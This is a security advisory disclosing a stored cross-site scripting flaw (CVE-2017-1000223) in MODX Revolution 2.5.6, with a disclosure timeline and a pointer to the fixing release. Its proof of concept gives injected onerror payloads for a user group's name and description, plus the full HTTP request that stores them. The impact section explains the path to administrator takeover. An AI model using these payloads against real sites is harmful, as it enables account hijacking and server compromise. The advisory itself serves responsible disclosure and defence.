Date

Information

Name:MODX Revolution 2.5.6
Software:MODX CMS
Homepage:https://modx.com
Vulnerability:stored WCI
Prerequisites:attacker needs to be authenticated and with permission to edit roles
Severity:medium
CVE:CVE-2017-1000223

Description

Several stored WCI (a.k.a XSS) were discovered in the latest MODX Revolution code. Authenticated user with permissions to edit roles can use it to execute malicious JavaScript and possibly take control over victims' accounts.

Proof of Concept

The functionality is located at:

(settings) -> Access Control Lists -> User Group & Users -> New User Group -> Name

Set the name of the group to:

<h1 style=color:red>Malicious</h1><img src=x onerror=alert(1)>

Set the description of the group to:

<h1 style=color:red>Malicious group</h1><img src=x onerror=alert(2)>

Following request is made after saving the form:

POST /connectors/index.php HTTP/1.1
Host: victim.site
modAuth: modx58dd6b78abecd0.81702322_158e1f669c75121.62443671
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 303
Cookie: PHPSESSID=mq0kub9tiu3dv7l00ec472n9v6
Connection: close

action=security%2Fgroup%2Fcreate&HTTP_MODAUTH=modx58dd6b78abecd0.81702322_158e1f669c75121.62443671&parent=0&name=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%3C%2Fh1%3E&description=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%20group%3C%2Fh1%3E&aw_users=&aw_resource_groups=&aw_contexts=web&policy=&aw_categories=

The payload is executed when the victim visits various pages where groups are rendered on the page:

Impact

Taking control over site's administrator leads to full compromise since the administrator can execute PHP by installing a plugin on the site. Attacker with permissions to edit user groups can use the functionality to execute malicious JavaScript on the victim's browsers. This can be used to take control over other users' sessions, which in turn leads to full site compromise if code is executed by the administrator.

Conclusion

Authenticated attacker with permissions to edit user groups can take control over administrator session and possibly execute PHP code on the server.

Following release has been published mitigating the issue: https://modx.com/blog/modx-revolution-2.5.7

Timeline

  • 01.04.2017 | me > developer     | vulnerability discovered
  • 03.04.2017 | me > developer     | sent the report to the developers
  • 13.04.2017 | developer > me     | acknowledged the finding
  • 21.04.2017 | developer > public | new version released
  • 29.04.2017 | me > developer     | reported issues with the fix; no response
  • 22.08.2017 | DWF > developer    | CVE assigned
  • 31.08.2017 | me > public        | full disclosure